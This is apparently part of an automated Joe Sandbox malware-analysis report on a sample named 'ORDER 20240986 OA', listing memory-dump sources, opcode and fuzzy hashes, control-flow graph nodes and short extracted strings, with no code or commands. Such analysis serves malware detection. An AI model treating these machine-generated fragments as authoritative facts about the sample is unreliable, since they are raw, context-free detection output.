                                                                                                                                                  • Opcode ID: 287afa90d7710067772a01eb116bad3fdb53c0ecdbe4489561321cb13d16f054
                                                                                                                                                  • Instruction ID: ff586f8589356aeec84c2b8b90de7741c15251a851f657fd640e0186a379ce6e
                                                                                                                                                  • Opcode Fuzzy Hash: 287afa90d7710067772a01eb116bad3fdb53c0ecdbe4489561321cb13d16f054
                                                                                                                                                  • Instruction Fuzzy Hash: 0A41D4B4E016188BEB18CFAAD9547DEBBF2BF89300F14C16AD418BB255EB345946CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950699365.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7620000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 67a5ff227e5548bd8c12ab5cdfb455b5787c7a5ea22eed7d725e3b9e7345c63f
                                                                                                                                                  • Instruction ID: 2e353033e87111602c59b81217db52b6709a1b387f0945a58c2ddabba29e41a3
                                                                                                                                                  • Opcode Fuzzy Hash: 67a5ff227e5548bd8c12ab5cdfb455b5787c7a5ea22eed7d725e3b9e7345c63f
                                                                                                                                                  • Instruction Fuzzy Hash: 544102B0E046188BDB58CFAAC8546DEBBF2BF89300F14C16AD419BB365EB344946CF40
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2974233369.000000003AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AC90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_3ac90000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9ec3d256229c30b3510ab450d2ab89dd811af854ce285334f22f7ed263dbdcfa
                                                                                                                                                  • Instruction ID: 229ba03bcce38e30e40a9b397a65ac95a0c2339b21f9638ba8f661cbd3725097
                                                                                                                                                  • Opcode Fuzzy Hash: 9ec3d256229c30b3510ab450d2ab89dd811af854ce285334f22f7ed263dbdcfa
                                                                                                                                                  • Instruction Fuzzy Hash: C241D274E012488BEB58CFAAC5546DDFBB2AF89300F24C12AD459BB265DB384946CF40
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2974233369.000000003AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AC90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_3ac90000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9731a077e435bcb393b8cb4d5c28cdd0dcd622082b620bca261a60d87aee232c
                                                                                                                                                  • Instruction ID: 8cc3d091f3fd9d014f485d0a9938a9bfbefbe02432a5ce6fbcd40bfcb0959646
                                                                                                                                                  • Opcode Fuzzy Hash: 9731a077e435bcb393b8cb4d5c28cdd0dcd622082b620bca261a60d87aee232c
                                                                                                                                                  • Instruction Fuzzy Hash: EC41D374E01648DBEB18CFAAD9546DDBBB2AF89300F24D12AC418BB265DB348946CF40
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 11ff18e04fff01c61f8fde3a16ee4226d8c9e82814ef1b8ca9f43c5f90852216
                                                                                                                                                  • Instruction ID: 6ef3a34a68db46036355cee62c37245a21ae26716b8552ce50135fe4689761e3
                                                                                                                                                  • Opcode Fuzzy Hash: 11ff18e04fff01c61f8fde3a16ee4226d8c9e82814ef1b8ca9f43c5f90852216
                                                                                                                                                  • Instruction Fuzzy Hash: 9441E3B4E006188BDB18DFAAD8546DEBBF2BF89300F10C12AD418BB264EB345946CF40

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 0 1576f1-157725 1 157b54-157b58 0->1 2 15772b-15774e 0->2 3 157b71-157b7f 1->3 4 157b5a-157b6e 1->4 11 157754-157761 2->11 12 1577fc-157800 2->12 9 157b81-157b96 3->9 10 157bf0-157c05 3->10 18 157b9d-157baa 9->18 19 157b98-157b9b 9->19 20 157c07-157c0a 10->20 21 157c0c-157c19 10->21 24 157770 11->24 25 157763-15776e 11->25 15 157802-157810 12->15 16 157848-157851 12->16 15->16 36 157812-15782d 15->36 22 157c67 16->22 23 157857-157861 16->23 26 157bac-157bed 18->26 19->26 27 157c1b-157c56 20->27 21->27 30 157c6c-157c85 22->30 23->1 28 157867-157870 23->28 31 157772-157774 24->31 25->31 71 157c5d-157c64 27->71 34 157872-157877 28->34 35 15787f-15788b 28->35 31->12 39 15777a-1577dc 31->39 34->35 35->30 37 157891-157897 35->37 56 15782f-157839 36->56 57 15783b 36->57 42 15789d-1578ad 37->42 43 157b3e-157b42 37->43 83 1577e2-1577f9 39->83 84 1577de 39->84 54 1578c1-1578c3 42->54 55 1578af-1578bf 42->55 43->22 46 157b48-157b4e 43->46 46->1 46->28 59 1578c6-1578cc 54->59 55->59 60 15783d-15783f 56->60 57->60 59->43 66 1578d2-1578e1 59->66 60->16 67 157841 60->67 68 1578e7 66->68 69 15798f-1579ba call 157538 * 2 66->69 67->16 73 1578ea-1578fb 68->73 88 157aa4-157abe 69->88 89 1579c0-1579c4 69->89 73->30 75 157901-157913 73->75 75->30 78 157919-157931 75->78 140 157933 call 158055 78->140 141 157933 call 1580d8 78->141 81 157939-157949 81->43 82 15794f-157952 81->82 86 157954-15795a 82->86 87 15795c-15795f 82->87 83->12 84->83 86->87 91 157965-157968 86->91 87->22 87->91 88->1 107 157ac4-157ac8 88->107 89->43 90 1579ca-1579ce 89->90 94 1579f6-1579fc 90->94 95 1579d0-1579dd 90->95 96 157970-157973 91->96 97 15796a-15796e 91->97 99 157a37-157a3d 94->99 100 1579fe-157a02 94->100 110 1579ec 95->110 111 1579df-1579ea 95->111 96->22 98 157979-15797d 96->98 97->96 97->98 98->22 105 157983-157989 98->105 102 157a3f-157a43 99->102 103 157a49-157a4f 99->103 100->99 106 157a04-157a0d 100->106 102->71 102->103 108 157a51-157a55 103->108 109 157a5b-157a5d 103->109 105->69 105->73 112 157a1c-157a32 106->112 113 157a0f-157a14 106->113 114 157b04-157b08 107->114 115 157aca-157ad4 call 1563e0 107->115 108->43 108->109 116 157a92-157a94 109->116 117 157a5f-157a68 109->117 118 1579ee-1579f0 110->118 111->118 112->43 113->112 114->71 120 157b0e-157b12 114->120 115->114 128 157ad6-157aeb 115->128 116->43 125 157a9a-157aa1 116->125 123 157a77-157a8d 117->123 124 157a6a-157a6f 117->124 118->43 118->94 120->71 126 157b18-157b25 120->126 123->43 124->123 131 157b34 126->131 132 157b27-157b32 126->132 128->114 137 157aed-157b02 128->137 134 157b36-157b38 131->134 132->134 134->43 134->71 137->1 137->114 140->81 141->81
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: (odq$(odq$(odq$(odq$(odq$(odq$,hq$,hq
                                                                                                                                                  • API String ID: 0-1376594924
                                                                                                                                                  • Opcode ID: cf22b1331946d2e7da056a1fb94eb01482827182650cebac2b1e5d16552ef4d2
                                                                                                                                                  • Instruction ID: 7d645bbcbd9b518854115c99a4987c664c72c9de2214a1d8c3a9da6e47d34832
                                                                                                                                                  • Opcode Fuzzy Hash: cf22b1331946d2e7da056a1fb94eb01482827182650cebac2b1e5d16552ef4d2
                                                                                                                                                  • Instruction Fuzzy Hash: 73126C30A04209CFCB15CF68E885AAEBBF2FF49315F148559E869DB2A1DB30ED45CB50

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 930 3ac93fe8-3ac93ff1 931 3ac93ffa-3ac93ffd 930->931 932 3ac93ff3-3ac93ff8 930->932 934 3ac93fff-3ac94004 931->934 935 3ac94006-3ac94009 931->935 933 3ac94032-3ac94035 932->933 934->933 936 3ac9400b-3ac94010 935->936 937 3ac94012-3ac94015 935->937 936->933 938 3ac9401e-3ac94021 937->938 939 3ac94017-3ac9401c 937->939 940 3ac9402a-3ac9402d 938->940 941 3ac94023-3ac94028 938->941 939->933 942 3ac9402f 940->942 943 3ac94036-3ac940a6 940->943 941->933 942->933 950 3ac940ab-3ac940ba call 3ac93f90 943->950 953 3ac940bc-3ac940d7 950->953 954 3ac94103-3ac94106 950->954 953->954 967 3ac940d9-3ac940dd 953->967 955 3ac94108-3ac9410e 954->955 956 3ac9411c-3ac9414b 954->956 955->950 958 3ac94110 955->958 961 3ac9414d-3ac94150 956->961 962 3ac94157-3ac9415d 956->962 960 3ac94112-3ac94119 958->960 961->962 964 3ac94152-3ac94155 961->964 965 3ac9415f-3ac94162 962->965 966 3ac94171-3ac941a5 962->966 964->962 968 3ac941a8-3ac94200 964->968 965->966 969 3ac94164-3ac94166 965->969 970 3ac940df-3ac940e4 967->970 971 3ac940e6-3ac940ef 967->971 976 3ac94207-3ac94287 968->976 969->966 972 3ac94168-3ac9416b 969->972 970->960 971->954 973 3ac940f1-3ac940fa 971->973 972->966 972->976 973->954 977 3ac940fc-3ac94101 973->977 995 3ac94289-3ac9428d 976->995 996 3ac942a7-3ac942fd 976->996 977->960 1033 3ac94290 call 3ac93fe8 995->1033 1034 3ac94290 call 3ac94088 995->1034 1035 3ac94290 call 3ac94351 995->1035 1036 3ac94290 call 3ac94385 995->1036 1037 3ac94290 call 3ac93fd7 995->1037 1002 3ac94308-3ac94311 996->1002 1003 3ac942ff-3ac94306 996->1003 997 3ac94293-3ac942a4 1005 3ac9431c 1002->1005 1006 3ac94313-3ac9431a 1002->1006 1004 3ac94323-3ac9432c 1003->1004 1007 3ac943c0-3ac943c7 call 3ac944cf 1004->1007 1008 3ac94332-3ac9434f 1004->1008 1005->1004 1006->1004 1010 3ac943cd-3ac943e9 1007->1010 1008->1010 1013 3ac943eb-3ac943ee 1010->1013 1014 3ac943f0-3ac9444a 1010->1014 1013->1014 1015 3ac94452-3ac9445b 1013->1015 1014->1015 1017 3ac9445d-3ac94460 1015->1017 1018 3ac94462-3ac94498 1015->1018 1017->1018 1019 3ac944c7-3ac944cd 1017->1019 1018->1019 1028 3ac9449a-3ac944bf 1018->1028 1028->1019 1033->997 1034->997 1035->997 1036->997 1037->997
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2974233369.000000003AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AC90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_3ac90000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 8iq$Hhq$Hhq$Hhq$TJiq
                                                                                                                                                  • API String ID: 0-844644037
                                                                                                                                                  • Opcode ID: a9b155426ad4b1ca6c0e14bb15b05887a3845d8e0c9e40f88766542ce2cbcf04
                                                                                                                                                  • Instruction ID: f429dc142c015acbd9f886fb09e1e89efce5a33f0ce3c24182c4d8a55795bb25
                                                                                                                                                  • Opcode Fuzzy Hash: a9b155426ad4b1ca6c0e14bb15b05887a3845d8e0c9e40f88766542ce2cbcf04
                                                                                                                                                  • Instruction Fuzzy Hash: A5D1E338B042448FDB05DB68C590ADE7FB6EF99320F1845AAE545EB3A1CB31DD42CB91

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1779 3ac93a50-3ac93a97 1783 3ac93a9d-3ac93a9f 1779->1783 1784 3ac93c73-3ac93c7e 1779->1784 1785 3ac93c85-3ac93c90 1783->1785 1786 3ac93aa5-3ac93aa9 1783->1786 1784->1785 1791 3ac93c97-3ac93ca2 1785->1791 1786->1785 1788 3ac93aaf-3ac93ae7 1786->1788 1788->1791 1800 3ac93aed-3ac93af1 1788->1800 1795 3ac93ca9-3ac93cb4 1791->1795 1799 3ac93cbb-3ac93ce7 1795->1799 1835 3ac93cee-3ac93d1a 1799->1835 1801 3ac93afd-3ac93b01 1800->1801 1802 3ac93af3-3ac93af7 1800->1802 1804 3ac93b0c-3ac93b10 1801->1804 1805 3ac93b03-3ac93b0a 1801->1805 1802->1795 1802->1801 1806 3ac93b28-3ac93b2c 1804->1806 1807 3ac93b12-3ac93b16 1804->1807 1805->1806 1808 3ac93b2e-3ac93b30 1806->1808 1809 3ac93b33-3ac93b3a 1806->1809 1811 3ac93b18-3ac93b1f 1807->1811 1812 3ac93b21 1807->1812 1808->1809 1813 3ac93b3c 1809->1813 1814 3ac93b43-3ac93b47 1809->1814 1811->1806 1812->1806 1813->1814 1815 3ac93bf8-3ac93bfb 1813->1815 1816 3ac93c61-3ac93c6c 1813->1816 1817 3ac93bc5-3ac93bc8 1813->1817 1818 3ac93b96-3ac93b99 1813->1818 1819 3ac93b4d-3ac93b51 1814->1819 1820 3ac93c26-3ac93c29 1814->1820 1822 3ac93bfd 1815->1822 1823 3ac93c02-3ac93c21 1815->1823 1816->1784 1829 3ac93bca-3ac93bcd 1817->1829 1830 3ac93bd3-3ac93bf6 1817->1830 1824 3ac93b9b-3ac93b9e 1818->1824 1825 3ac93ba4-3ac93bc3 1818->1825 1819->1816 1826 3ac93b57-3ac93b5a 1819->1826 1827 3ac93c39-3ac93c5c 1820->1827 1828 3ac93c2b-3ac93c2e 1820->1828 1822->1823 1850 3ac93b7f-3ac93b83 1823->1850 1824->1799 1824->1825 1825->1850 1832 3ac93b5c 1826->1832 1833 3ac93b61-3ac93b7d 1826->1833 1827->1850 1828->1827 1834 3ac93c30-3ac93c33 1828->1834 1829->1830 1829->1835 1830->1850 1832->1833 1833->1850 1834->1827 1839 3ac93d21-3ac93d93 1834->1839 1835->1839 1860 3ac93df5-3ac93e59 1839->1860 1861 3ac93d95-3ac93d98 1839->1861 1883 3ac93b86 call 3ac93fe8 1850->1883 1884 3ac93b86 call 3ac94088 1850->1884 1885 3ac93b86 call 3ac93fd7 1850->1885 1853 3ac93b8c-3ac93b93 1878 3ac93e5b-3ac93e60 1860->1878 1879 3ac93e62-3ac93e72 1860->1879 1861->1860 1862 3ac93d9a-3ac93da9 1861->1862 1865 3ac93dab-3ac93db1 1862->1865 1866 3ac93dc1-3ac93dc5 1862->1866 1868 3ac93db3 1865->1868 1869 3ac93db5-3ac93db7 1865->1869 1870 3ac93ded-3ac93df4 1866->1870 1871 3ac93dc7-3ac93de7 1866->1871 1868->1866 1869->1866 1871->1870 1880 3ac93e77-3ac93e78 1878->1880 1879->1880 1883->1853 1884->1853 1885->1853
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2974233369.000000003AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AC90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_3ac90000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $Hhq$Hhq$Hhq
                                                                                                                                                  • API String ID: 0-3117650334
                                                                                                                                                  • Opcode ID: 12449f1bcc6a2e43dc591c7ba4acbde9ee5b1f5a9a312419c68fa3454b401006
                                                                                                                                                  • Instruction ID: bee7846951183744843715d2ecc601a18ddf08af5866f6b03da0910679d699ee
                                                                                                                                                  • Opcode Fuzzy Hash: 12449f1bcc6a2e43dc591c7ba4acbde9ee5b1f5a9a312419c68fa3454b401006
                                                                                                                                                  • Instruction Fuzzy Hash: C1A1DF387046549FDB159F3888692AE3BB2EF85360B24462DE956DB3E1CF348D42CB91
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950756812.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7660000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Tedq$Tedq
                                                                                                                                                  • API String ID: 0-4137347946
                                                                                                                                                  • Opcode ID: 7359271e1089ee63386b2856042c46ca0921556e0d8a49f3874585d5712dbcda
                                                                                                                                                  • Instruction ID: 76da8e663956db3e63cf76079fd9b5b542cef243bdb2eb2be51a0cdb64836c75
                                                                                                                                                  • Opcode Fuzzy Hash: 7359271e1089ee63386b2856042c46ca0921556e0d8a49f3874585d5712dbcda
                                                                                                                                                  • Instruction Fuzzy Hash: 7E82B174A01229DFCB64DFA4C998BE9B7B2FB89300F1041E9D809A7361DB359E85CF50
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950756812.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7660000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Tedq$Tedq
                                                                                                                                                  • API String ID: 0-4137347946
                                                                                                                                                  • Opcode ID: 6ea224265c1a59ee7e836551d185195bfedf5ec9f16888b2a15fe591ee2a0877
                                                                                                                                                  • Instruction ID: 44a6f2b00ed0f22d00ff53d02a15ce584b5fdeb5597672c6339c83f15835f66e
                                                                                                                                                  • Opcode Fuzzy Hash: 6ea224265c1a59ee7e836551d185195bfedf5ec9f16888b2a15fe591ee2a0877
                                                                                                                                                  • Instruction Fuzzy Hash: 7482B074A01229DFCB64DFA4C998BE9B7B2FB89300F1041E9D809A7361DB359E85CF50
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Hhq$Hhq
                                                                                                                                                  • API String ID: 0-2450388649
                                                                                                                                                  • Opcode ID: b1a56a4880d864134663e128b61d36712b8f9ffde407b1c5dd6445651edb33f6
                                                                                                                                                  • Instruction ID: 25a4e291f661d5af4fd24982aeb771d8e4b36d8e5578fc90ee411f43bc11adca
                                                                                                                                                  • Opcode Fuzzy Hash: b1a56a4880d864134663e128b61d36712b8f9ffde407b1c5dd6445651edb33f6
                                                                                                                                                  • Instruction Fuzzy Hash: CAB19E70708251CFCB159F74C894A7A7BB2AF89302F55456AE856CF3A2CB34CC8AD791
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950680601.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7610000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LRdq$LRdq
                                                                                                                                                  • API String ID: 0-3657686274
                                                                                                                                                  • Opcode ID: d54612e51b53c5ac67ae16fb29c0fef92ea11f9a248b8484016e52782937e959
                                                                                                                                                  • Instruction ID: f7e7e664a28d12b82623265834dadd3e6ba2f8837ca450901048a473a083f7c2
                                                                                                                                                  • Opcode Fuzzy Hash: d54612e51b53c5ac67ae16fb29c0fef92ea11f9a248b8484016e52782937e959
                                                                                                                                                  • Instruction Fuzzy Hash: 2381B274B001069FCB04DF78C95896E7BF6BF89705B19816AE806DB3A1DB35DD02CB91
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ,hq$,hq
                                                                                                                                                  • API String ID: 0-3475114797
                                                                                                                                                  • Opcode ID: 02a17f8f4b7021bf0d63c54c81c2104729801e6213ad3d328872fa4360d8bc47
                                                                                                                                                  • Instruction ID: 022c47e17e37395053d02d8719b8a525d394c1a5de3ef16feb6a3df420fb4eea
                                                                                                                                                  • Opcode Fuzzy Hash: 02a17f8f4b7021bf0d63c54c81c2104729801e6213ad3d328872fa4360d8bc47
                                                                                                                                                  • Instruction Fuzzy Hash: 64819F74A00505CFCB18CF69C48496ABBB2BF89316BA58169D825EF365DB31EC49CBD0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $dq$$dq
                                                                                                                                                  • API String ID: 0-2340669324
                                                                                                                                                  • Opcode ID: 5165a0225c4532b2da23f59f07ab7c3fa587969fffea596e2229dd7c71a11b0d
                                                                                                                                                  • Instruction ID: ee701395f760bee796ec52389bd2bcb8c7e943c21b66d36492956c7f33364ef2
                                                                                                                                                  • Opcode Fuzzy Hash: 5165a0225c4532b2da23f59f07ab7c3fa587969fffea596e2229dd7c71a11b0d
                                                                                                                                                  • Instruction Fuzzy Hash: 95318530308151CFCB258B79D89467E7B77AB89712B25055BE826EF692DF28CC888791
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2974233369.000000003AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AC90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_3ac90000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 8iq$TJiq
                                                                                                                                                  • API String ID: 0-752956030
                                                                                                                                                  • Opcode ID: 751757fb2d632fac4acf5e573e52f11aa13e9cdea419de53d60f2ad7ec29f924
                                                                                                                                                  • Instruction ID: a1bcc859647ca2680a2c4ad8f303ec7ef183be2d285a09fcd69a082e5f60d6af
                                                                                                                                                  • Opcode Fuzzy Hash: 751757fb2d632fac4acf5e573e52f11aa13e9cdea419de53d60f2ad7ec29f924
                                                                                                                                                  • Instruction Fuzzy Hash: F1310579B002099FCB44DFA8C581EDDBBB2BF98320F195544E505EB366DA30ED858BA0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2974233369.000000003AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AC90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_3ac90000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 8iq$TJiq
                                                                                                                                                  • API String ID: 0-752956030
                                                                                                                                                  • Opcode ID: f30cd3d43fb5ef8479b908706dcd9866aafa19301dc9320dc2df54626bc730c3
                                                                                                                                                  • Instruction ID: 8a604353349b8e96a9721096c1f11b8b1c92bfff86f13e79cb57204bc2cb49c5
                                                                                                                                                  • Opcode Fuzzy Hash: f30cd3d43fb5ef8479b908706dcd9866aafa19301dc9320dc2df54626bc730c3
                                                                                                                                                  • Instruction Fuzzy Hash: 8F310479B001098FCB44DFA8C580EDDBBB2EF88320F196554E505EB366DA71ED858BA0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4'dq$4'dq
                                                                                                                                                  • API String ID: 0-2306408947
                                                                                                                                                  • Opcode ID: 08a93a594334743bdd984caeec5723c40ab0141cf46feb50925748c135e5db7f
                                                                                                                                                  • Instruction ID: 9e22fc7b4430d4061353cfccc6d1ad647da7ddb8ffb75cf528d143973bb1afdf
                                                                                                                                                  • Opcode Fuzzy Hash: 08a93a594334743bdd984caeec5723c40ab0141cf46feb50925748c135e5db7f
                                                                                                                                                  • Instruction Fuzzy Hash: 34F06835300114AFDB085BA5985497FBBEBEBCC361B148429BD0AC7391DF71CC4593A1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LRdq
                                                                                                                                                  • API String ID: 0-3106745678
                                                                                                                                                  • Opcode ID: 2906ef56635d289427fb8195ec59215633e5e73d00c55960127f79c116dc8959
                                                                                                                                                  • Instruction ID: 9f0c21552c83197e50b24f87903495899521ce7c404a7bf0f23baa788e773e8f
                                                                                                                                                  • Opcode Fuzzy Hash: 2906ef56635d289427fb8195ec59215633e5e73d00c55960127f79c116dc8959
                                                                                                                                                  • Instruction Fuzzy Hash: 8652B574E0061ADFCB54DF64DD94AD9BBB2FB88301F1085A9D409A7361DB346E8ACF50
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950680601.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7610000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Hhq
                                                                                                                                                  • API String ID: 0-4210879014
                                                                                                                                                  • Opcode ID: 7227e2a20f1c47c00800e158d8fcf26cdfec745aa346d420c27fc08d542629e3
                                                                                                                                                  • Instruction ID: 3a47109e0190468c32047b2dad0961d91703bce0f35156bddd26f233d429f7cf
                                                                                                                                                  • Opcode Fuzzy Hash: 7227e2a20f1c47c00800e158d8fcf26cdfec745aa346d420c27fc08d542629e3
                                                                                                                                                  • Instruction Fuzzy Hash: CC81E174E012289FDB65DF65CC54BEEBBB2AF89300F1481AAD40DAB291DB355E81CF44
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950756812.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7660000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Tedq
                                                                                                                                                  • API String ID: 0-228892971
                                                                                                                                                  • Opcode ID: 3b29475189694ea6ef0cd55b171f0de2d0cf16905e3e692c7777e09927cbc190
                                                                                                                                                  • Instruction ID: 89760519adb0cdd2fe3d275ccac46af4b7ea2e40eb6f5cfcdf71294a3679b7da
                                                                                                                                                  • Opcode Fuzzy Hash: 3b29475189694ea6ef0cd55b171f0de2d0cf16905e3e692c7777e09927cbc190
                                                                                                                                                  • Instruction Fuzzy Hash: 9461A3B4E00218DFDB54DFA9C890ADDBBB2FF89300F24816AD809AB355DB305986CF50
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950756812.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7660000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Tedq
                                                                                                                                                  • API String ID: 0-228892971
